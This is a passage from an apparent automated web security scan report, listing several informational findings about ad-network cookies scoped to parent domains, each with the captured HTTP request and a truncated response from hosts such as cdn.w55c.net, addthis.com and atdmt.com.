P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 21 Apr 2011 23:51:09 GMT
Date: Sun, 24 Apr 2011 15:24:15 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1246

<IFRAME SRC="http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUm
...[SNIP]...

17.65. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RilLTaqf1_958911823.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681865&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663865478&bpp=16&shv=r20110420&jsv=r20110415&correlator=1303663865496&frm=1&adk=2614322350&ga_vid=1538346491.1303663866&ga_sid=1303663866&ga_hid=2007194349&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=121
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:56:20 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:50:11 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 06 Apr 2011 17:50:22 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1380

<IFRAME SRC="http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1l
...[SNIP]...

17.66. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RkPQrQRFy_1341446950.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676403&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658403541&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658403548&frm=1&adk=513358139&ga_vid=764788207.1303658404&ga_sid=1303658404&ga_hid=1212953574&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:14 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Fri, 01 Apr 2011 14:32:11 GMT
Date: Sun, 24 Apr 2011 15:19:34 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1238

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQ
...[SNIP]...

17.67. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:19:53 GMT
Cache-Control: no-cache, no-store
content-type: text/html
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 409
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)
Content-Length: 2174

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...

17.68. http://cdn.w55c.net/i/0RphY9og2j_721933665.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RphY9og2j_721933665.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676420&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658420103&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303658420112&frm=1&adk=513358139&ga_vid=35710902.1303658420&ga_sid=1303658420&ga_hid=969894465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:33 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 30 Mar 2011 19:16:28 GMT
Date: Sun, 24 Apr 2011 15:19:52 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 419

<iframe src="http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-2?mpt=[CACHEBUSTER]&mpvc=" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor="
...[SNIP]...

17.69. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RuFuATqDZ_452086828.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RuFuATqDZ_452086828.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZwU0VZRzVFdQ&ciu=MFJ1RnVBVHFEWg&reqid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=850&zc=NzUyMDc&v=0&s=http%3A%2F%2F& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381022&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658381041&frm=1&adk=513358139&ga_vid=971996930.1303658381&ga_sid=1303658381&ga_hid=548328206&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=27
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:19:39 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 11 Apr 2011 19:58:56 GMT
Date: Sun, 24 Apr 2011 15:17:54 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 731

<iframe id='a22bf83a' name='a22bf83a' src='http://d.w55c.net/afr.php?zoneid=768&amp;cb=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYX
...[SNIP]...

17.70. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4db4511e2659ba2c&callback=_ate.ad.hrr&pub=vpls&uid=4dab4fa85facd099&url=http%3A%2F%2Fkrypt.com%2F&1npnqde HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; dt=X; psc=3; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sun, 24 Apr 2011 16:34:36 GMT
Set-Cookie: di=1303529621.60|1303529621.1FE; Domain=.addthis.com; Expires=Tue, 23-Apr-2013 16:34:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 24-May-2011 16:34:36 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Sun, 24 Apr 2011 16:34:35 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

17.71. http://clk.atdmt.com/go/253732016/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/253732016/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db41880; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 24 Apr 2011 12:33:03 GMT
Connection: close


17.72. http://cmi.netseer.com/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cmi.netseer.com
Path:   /match

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /match?ex=10&id=CAESELOuaNIo-ALjWWVJnFruZF0&cver=1 HTTP/1.1
Host: cmi.netseer.com
Proxy-Connection: keep-alive
